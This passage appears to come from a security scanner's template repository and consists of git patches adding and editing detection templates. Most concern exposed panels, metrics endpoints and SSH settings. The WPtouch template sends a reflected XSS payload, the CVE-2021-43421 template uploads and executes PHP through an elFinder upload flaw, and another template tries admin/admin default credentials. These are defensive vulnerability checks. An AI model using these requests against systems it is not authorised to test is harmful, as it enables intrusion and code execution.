From: Dhiyaneshwaran Date: Wed, 23 Nov 2022 14:40:19 +0530 Subject: [PATCH 0554/1415] Update nuxeo-platform-login.yaml --- exposed-panels/nuxeo-platform-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/nuxeo-platform-login.yaml b/exposed-panels/nuxeo-platform-login.yaml index 8ed2554404..dc5fc89584 100644 --- a/exposed-panels/nuxeo-platform-login.yaml +++ b/exposed-panels/nuxeo-platform-login.yaml @@ -5,6 +5,7 @@ info: author: kishore-hariram severity: info metadata: + verified: true shodan-query: title:"Nuxeo Platform" tags: panel,nuxeo From a9b6ce933204ce8c8304d7fd5f17f673d74357c2 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 23 Nov 2022 11:17:31 -0500 Subject: [PATCH 0555/1415] Create oracle-httpserver12c-files.yaml --- technologies/oracle-httpserver12c-files.yaml | 31 ++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 technologies/oracle-httpserver12c-files.yaml diff --git a/technologies/oracle-httpserver12c-files.yaml b/technologies/oracle-httpserver12c-files.yaml new file mode 100644 index 0000000000..41e30596a3 --- /dev/null +++ b/technologies/oracle-httpserver12c-files.yaml @@ -0,0 +1,31 @@ +id: oracle-httpserver12c-files + +info: + name: Oracle HTTPServer12c files + author: tess + severity: info + metadata: + verified: true + tags: oracle,files + +requests: + - method: GET + path: + - '{{BaseURL}}/OracleHTTPServer12c_files/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Index of /OracleHTTPServer12c_files" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 1dc643736e096cc2781d03863b157f1c0fe9888b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 23 Nov 2022 17:23:23 +0000 Subject: [PATCH 0556/1415] Auto Generated New Template Addition List [Wed Nov 23 17:23:23 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7d82487148..187307ae79 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +misconfiguration/s3-torrent.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml From 1301ba2000b46fb9e85eecaf5208c1d4864e0d4a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 23:42:39 +0530 Subject: [PATCH 0557/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index 5b199aa892..b566641be8 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. + remediation: | + Disable MD5 and 96-bit MAC algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled metadata: From e836f87abef4958a2cc2cda40c9c1346b82ba83a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 23:44:28 +0530 Subject: [PATCH 0558/1415] Update dropbear-weakalgo-detect.yaml --- network/detection/dropbear-weakalgo-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/detection/dropbear-weakalgo-detect.yaml index 855f8248ae..4d42a17c92 100644 --- a/network/detection/dropbear-weakalgo-detect.yaml +++ b/network/detection/dropbear-weakalgo-detect.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. + remediation: | + Disable the weak algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled metadata: From 3756b62c5a646b4d21a6d98ff5286704efda4c2b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 23:45:18 +0530 Subject: [PATCH 0559/1415] Update dropbear-cbc-ciphers.yaml --- network/detection/dropbear-cbc-ciphers.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index 8cdc1d16a7..df15542885 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. + remediation: | + Disable CBC Ciphers. reference: | https://www.tenable.com/plugins/nessus/70658 metadata: From 2292877e4208af4acc71921a5f18a0d07979cf82 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 10:00:35 +0530 Subject: [PATCH 0560/1415] Create wptouch-xss.yaml --- vulnerabilities/wordpress/wptouch-xss.yaml | 42 ++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 vulnerabilities/wordpress/wptouch-xss.yaml diff --git a/vulnerabilities/wordpress/wptouch-xss.yaml b/vulnerabilities/wordpress/wptouch-xss.yaml new file mode 100644 index 0000000000..76f566a9d8 --- /dev/null +++ b/vulnerabilities/wordpress/wptouch-xss.yaml @@ -0,0 +1,42 @@ +id: wptouch-xss + +info: + name: WPtouch < 4.3.44 - Reflected Cross-Site Scripting + author: akincibor + severity: medium + description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4 + tags: wp-plugin,xss,wp,wordpress,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e4d91857c9531501958258580bf51d580a74c2a7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 10:01:36 +0530 Subject: [PATCH 0561/1415] Update wptouch-xss.yaml --- vulnerabilities/wordpress/wptouch-xss.yaml | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/wordpress/wptouch-xss.yaml b/vulnerabilities/wordpress/wptouch-xss.yaml index 76f566a9d8..b864f30c74 100644 --- a/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/vulnerabilities/wordpress/wptouch-xss.yaml @@ -1,22 +1,22 @@ id: wptouch-xss info: - name: WPtouch < 4.3.44 - Reflected Cross-Site Scripting + name: WPtouch < 4.3.44 - Cross Site Scripting author: akincibor severity: medium - description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + description: | + The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4 - tags: wp-plugin,xss,wp,wordpress,authenticated + - https://wordpress.org/plugins/wptouch/advanced/ + tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} - Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 @@ -32,6 +32,14 @@ requests: words: - '">' + - type: word + part: body + words: + - 'WPtouchCustom' + - 'WPtouchAjax' + - 'toplevel_page_wptouch-admin' + condition: or + - type: word part: header words: From 47464034f4f5451142cbc4639b60a633c32a0afd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 11:05:34 +0530 Subject: [PATCH 0562/1415] Create CVE-2021-43421.yaml --- cves/2021/CVE-2021-43421.yaml | 49 +++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 cves/2021/CVE-2021-43421.yaml diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml new file mode 100644 index 0000000000..9d69233ed8 --- /dev/null +++ b/cves/2021/CVE-2021-43421.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-43421 + +info: + name: Studio-42 elFinder RCE <2.1.60 + author: akincibor + severity: critical + description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. + reference: + - https://github.com/Studio-42/elFinder/issues/3429 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 + tags: cve,cve2021,rce,unauth,elfinder + +requests: + - raw: + - | + GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /2/elFinder/php/connector.minimal.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, /; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e + + - | + GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + extractors: + - type: regex + name: hash + internal: true + group: 1 + regex: + - '"hash"\:"(.*?)"\,' + + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_3, "{{randstr_1}}")' + - "status_code_3 == 200" + condition: and From f1c9b9802d83f7a2bae0593e7b314572bdf1d641 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 11:09:24 +0530 Subject: [PATCH 0563/1415] Update CVE-2021-43421.yaml --- cves/2021/CVE-2021-43421.yaml | 43 ++++++++++++++++++----------------- 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 9d69233ed8..d996c5ac96 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -1,49 +1,50 @@ id: CVE-2021-43421 info: - name: Studio-42 elFinder RCE <2.1.60 + name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload author: akincibor severity: critical - description: A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. + description: | + A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 - tags: cve,cve2021,rce,unauth,elfinder + tags: cve,cve2021,elfinder,unauth,upload,rce requests: - raw: - | - GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1 Host: {{Hostname}} Accept: */* - | - POST /2/elFinder/php/connector.minimal.php HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, /; q=0.01 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - | - GET /2/elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 + GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1 Host: {{Hostname}} Accept: */* - extractors: - - type: regex - name: hash - internal: true - group: 1 - regex: - - '"hash"\:"(.*?)"\,' - + - | + GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 + Host: {{Hostname}} + Accept: */* req-condition: true matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' - - "status_code_3 == 200" + - 'contains(body_3, "{{randstr}}")' + - 'contains(body_4, "{{randstr_1}}")' + - "status_code == 200" condition: and + + extractors: + - type: regex + name: hash + group: 1 + regex: + - '"hash"\:"(.*?)"\,' + internal: true From 8382da72a9d45e03914f23572b5256b864f216da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 11:09:40 +0530 Subject: [PATCH 0564/1415] Update CVE-2021-43421.yaml --- cves/2021/CVE-2021-43421.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index d996c5ac96..32a96a0fd4 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -9,6 +9,10 @@ info: reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 + classification: + cve-id: CVE-2021-43421 + metadata: + verified: true tags: cve,cve2021,elfinder,unauth,upload,rce requests: From c21f0068c6887597e774e2b9d908863f40572b51 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 11:12:17 +0530 Subject: [PATCH 0565/1415] Update CVE-2021-43421.yaml --- cves/2021/CVE-2021-43421.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 32a96a0fd4..52138e0c98 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43421 info: - name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload + name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload author: akincibor severity: critical description: | From 3f1d0852ac0173c0fceeaf14249bde5d167677a1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 12:52:17 +0530 Subject: [PATCH 0566/1415] Update kingsoft-v8-default-login.yaml --- default-logins/others/kingsoft-v8-default-login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/default-logins/others/kingsoft-v8-default-login.yaml b/default-logins/others/kingsoft-v8-default-login.yaml index 0983dd80e7..174e26d5fe 100644 --- a/default-logins/others/kingsoft-v8-default-login.yaml +++ b/default-logins/others/kingsoft-v8-default-login.yaml @@ -3,7 +3,7 @@ id: kingsoft-v8-default-login info: name: Kingsoft V8 Default Login author: ritikchaddha - severity: medium + severity: high reference: - https://idc.wanyunshuju.com/aqld/2123.html tags: kingsoft,default-login @@ -14,7 +14,7 @@ requests: POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 Host: {{Hostname}} - {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}} + {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}} attack: pitchfork payloads: @@ -22,6 +22,7 @@ requests: - admin password: - admin + host-redirects: true max-redirects: 2 matchers-condition: and From a4b5b9a1133953648f4c58c277f09ba871178479 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 13:15:33 +0530 Subject: [PATCH 0568/1415] Update postgres-exporter-metrics.yaml --- misconfiguration/postgres-exporter-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/postgres-exporter-metrics.yaml b/misconfiguration/postgres-exporter-metrics.yaml index 344ebf3479..b35fc37179 100644 --- a/misconfiguration/postgres-exporter-metrics.yaml +++ b/misconfiguration/postgres-exporter-metrics.yaml @@ -1,7 +1,7 @@ id: postgres-exporter-metrics info: - name: Detect Postgres Exporter Metrics + name: Postgres Exporter Metrics author: DhiyaneshDk severity: low metadata: @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "pg_database_size_bytes" - - "datname" + - "postgres" + - "# HELP" condition: and - type: status From 365e2a1d3a9f0e2fd8232a9c8a2e1a681d0baae5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 13:29:04 +0530 Subject: [PATCH 0569/1415] Update libvirt-exporter-metrics.yaml --- misconfiguration/libvirt-exporter-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/libvirt-exporter-metrics.yaml b/misconfiguration/libvirt-exporter-metrics.yaml index cdf6ae047f..24f497b12b 100644 --- a/misconfiguration/libvirt-exporter-metrics.yaml +++ b/misconfiguration/libvirt-exporter-metrics.yaml @@ -1,7 +1,7 @@ id: libvirt-exporter-metrics info: - name: Detect Libvirt Exporter Metrics + name: Libvirt Exporter Metrics author: DhiyaneshDk severity: low metadata: @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "libvirt_domains_number" - - "libvirt_up" + - "# HELP" + - "libvirt_" condition: and - type: status From 62d5351ad8da2a29d41c5d9469a28431d35282ec Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 13:35:28 +0530 Subject: [PATCH 0570/1415] Update and rename named-process-exporter-metrics.yaml to namedprocess-exporter-metrics.yaml --- ...er-metrics.yaml => namedprocess-exporter-metrics.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename misconfiguration/{named-process-exporter-metrics.yaml => namedprocess-exporter-metrics.yaml} (74%) diff --git a/misconfiguration/named-process-exporter-metrics.yaml b/misconfiguration/namedprocess-exporter-metrics.yaml similarity index 74% rename from misconfiguration/named-process-exporter-metrics.yaml rename to misconfiguration/namedprocess-exporter-metrics.yaml index 822555cf50..bcece704f5 100644 --- a/misconfiguration/named-process-exporter-metrics.yaml +++ b/misconfiguration/namedprocess-exporter-metrics.yaml @@ -1,7 +1,7 @@ -id: named-process-exporter-metrics +id: namedprocess-exporter-metrics info: - name: Detect Named Process Exporter + name: Named Process Exporter author: DhiyaneshDk severity: low metadata: @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "namedprocess_namegroup" - - "groupname" + - "namedprocess" + - "# HELP" condition: and - type: status From 4e525851aec0ccc34f57a4d4975f6fcd4acd123f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 08:05:57 +0000 Subject: [PATCH 0571/1415] Auto Generated New Template Addition List [Thu Nov 24 08:05:57 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 187307ae79..28d9a81ea1 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,6 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +misconfiguration/libvirt-exporter-metrics.yaml +misconfiguration/postgres-exporter-metrics.yaml misconfiguration/s3-torrent.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml From bb4c0346d4871cf444cc85c1e6995c4fa051c4d2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 08:07:37 +0000 Subject: [PATCH 0573/1415] Auto Generated New Template Addition List [Thu Nov 24 08:07:37 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 28d9a81ea1..66c8827027 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ exposed-panels/fastpanel-hosting-control-panel.yaml misconfiguration/libvirt-exporter-metrics.yaml +misconfiguration/namedprocess-exporter-metrics.yaml misconfiguration/postgres-exporter-metrics.yaml misconfiguration/s3-torrent.yaml technologies/payara-micro-server-detect.yaml From 3f5e1c8f9121fda4fc04ab6dcb001bfb121de2e9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 13:44:40 +0530 Subject: [PATCH 0574/1415] Update rabbitmq-exporter-metrics.yaml --- misconfiguration/rabbitmq-exporter-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/rabbitmq-exporter-metrics.yaml b/misconfiguration/rabbitmq-exporter-metrics.yaml index 0e7e1bff3a..87c71ac881 100644 --- a/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -1,7 +1,7 @@ id: rabbitmq-exporter-metrics info: - name: Detect RabbitMQ Exporter + name: RabbitMQ Exporter author: DhiyaneshDk severity: low metadata: From 827dcc3862ab146b1ee678ab69648cd812171946 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:04:58 +0530 Subject: [PATCH 0575/1415] Update mysqld-exporter-metrics.yaml --- misconfiguration/mysqld-exporter-metrics.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/mysqld-exporter-metrics.yaml b/misconfiguration/mysqld-exporter-metrics.yaml index ab501d41cc..a211c4fd73 100644 --- a/misconfiguration/mysqld-exporter-metrics.yaml +++ b/misconfiguration/mysqld-exporter-metrics.yaml @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "mysql_up" - - "mysqld_exporter_build_info" + - "mysqld" + - "# HELP" condition: and - type: status From 2f7aad0fafea38618aa9321e973cec1b7c4be266 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 08:37:31 +0000 Subject: [PATCH 0576/1415] Auto Generated New Template Addition List [Thu Nov 24 08:37:31 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 66c8827027..a947fba79a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,7 +1,9 @@ exposed-panels/fastpanel-hosting-control-panel.yaml misconfiguration/libvirt-exporter-metrics.yaml +misconfiguration/mysqld-exporter-metrics.yaml misconfiguration/namedprocess-exporter-metrics.yaml misconfiguration/postgres-exporter-metrics.yaml +misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml From a4292ec6ddc1173e1df93ef132c6b4f58017e7c3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:09:41 +0530 Subject: [PATCH 0578/1415] Update collectd-exporter-metrics.yaml --- misconfiguration/collectd-exporter-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/collectd-exporter-metrics.yaml b/misconfiguration/collectd-exporter-metrics.yaml index 55bf65a2d9..5e8acb3902 100644 --- a/misconfiguration/collectd-exporter-metrics.yaml +++ b/misconfiguration/collectd-exporter-metrics.yaml @@ -1,7 +1,7 @@ id: collectd-exporter-metrics info: - name: Detect Collectd Exporter + name: Collectd Exporter Metrics author: DhiyaneshDk severity: low metadata: @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "collectd_cpu_percent" - - "collectd_exporter_build_info" + - "# HELP" + - "collectd_" condition: and - type: status From 1e5bb286ff77c430a31c09dce0ca4a969eca5f87 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:18:25 +0530 Subject: [PATCH 0579/1415] Update lvm-exporter-metrics.yaml --- misconfiguration/lvm-exporter-metrics.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/misconfiguration/lvm-exporter-metrics.yaml b/misconfiguration/lvm-exporter-metrics.yaml index 45a3cd7870..ff23e6723e 100644 --- a/misconfiguration/lvm-exporter-metrics.yaml +++ b/misconfiguration/lvm-exporter-metrics.yaml @@ -1,7 +1,7 @@ id: lvm-exporter-metrics info: - name: Detect LVM Exporter + name: LVM Exporter Metrics author: DhiyaneshDk severity: low metadata: @@ -19,13 +19,13 @@ requests: - type: word part: body words: - - "HELP lvm_lv" + - "# HELP" - type: word part: body words: - - "lvm_lv_health_status" - - "lvm_lv_permission" + - "lvm_" + - "promhttp" condition: or - type: status From 6109189b27c49db345ce40ddc521af684a967005 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 08:49:05 +0000 Subject: [PATCH 0580/1415] Auto Generated New Template Addition List [Thu Nov 24 08:49:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a947fba79a..25ede858b6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +misconfiguration/collectd-exporter-metrics.yaml misconfiguration/libvirt-exporter-metrics.yaml misconfiguration/mysqld-exporter-metrics.yaml misconfiguration/namedprocess-exporter-metrics.yaml From b541ef7e13d3e05b209f32d77def9def196670ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:24:30 +0530 Subject: [PATCH 0581/1415] Update mach-proweb-login.yaml --- exposed-panels/mach-proweb-login.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/exposed-panels/mach-proweb-login.yaml b/exposed-panels/mach-proweb-login.yaml index cde68bff1f..223347ff1f 100644 --- a/exposed-panels/mach-proweb-login.yaml +++ b/exposed-panels/mach-proweb-login.yaml @@ -1,7 +1,7 @@ id: mach-proweb-login info: - name: MACH-ProWeb Login panel + name: MACH-ProWeb Login Panel author: Jaskaran severity: info description: | @@ -20,8 +20,9 @@ requests: matchers-condition: and matchers: - - type: regex - regex: + - type: word + part: body + words: - 'Log on to MACH-ProWeb' - type: status From bdc87fe1b0ae7c0a33717d2f2847d2e199f06872 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Nov 2022 09:08:04 +0000 Subject: [PATCH 0582/1415] Auto Generated New Template Addition List [Thu Nov 24 09:08:04 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 25ede858b6..537d3110ce 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ exposed-panels/fastpanel-hosting-control-panel.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/libvirt-exporter-metrics.yaml +misconfiguration/lvm-exporter-metrics.yaml misconfiguration/mysqld-exporter-metrics.yaml misconfiguration/namedprocess-exporter-metrics.yaml misconfiguration/postgres-exporter-metrics.yaml From d63a0682c03687737373a8704a6f419d96e6ca30 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:49:41 +0530 Subject: [PATCH 0583/1415] Update and rename nuxeo-platform-login.yaml to nuxeo-platform-panel.yaml --- ...uxeo-platform-login.yaml => nuxeo-platform-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename exposed-panels/{nuxeo-platform-login.yaml => nuxeo-platform-panel.yaml} (67%) diff --git a/exposed-panels/nuxeo-platform-login.yaml b/exposed-panels/nuxeo-platform-panel.yaml similarity index 67% rename from exposed-panels/nuxeo-platform-login.yaml rename to exposed-panels/nuxeo-platform-panel.yaml index dc5fc89584..e46de200c5 100644 --- a/exposed-panels/nuxeo-platform-login.yaml +++ b/exposed-panels/nuxeo-platform-panel.yaml @@ -1,7 +1,7 @@ -id: nuxeo-platform-login +id: nuxeo-platform-panel info: - name: Nuxeo Platform Login + name: Nuxeo Platform Login Panel author: kishore-hariram severity: info metadata: @@ -18,7 +18,9 @@ requests: matchers: - type: word words: - - "Nuxeo Platform" + - 'Nuxeo Platform' + - 'alt="Nuxeo"' + condition: or - type: status status: From 735ad99aefdc5cfddaf6281722c0125a50bd6fef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 24 Nov 2022 14:51:12 +0530 Subject: [PATCH 0584/1415] Update CVE-2022-41840.yaml --- cves/2022/CVE-2022-41840.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index b664082bef..3dc77ef567 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -10,14 +10,13 @@ info: - 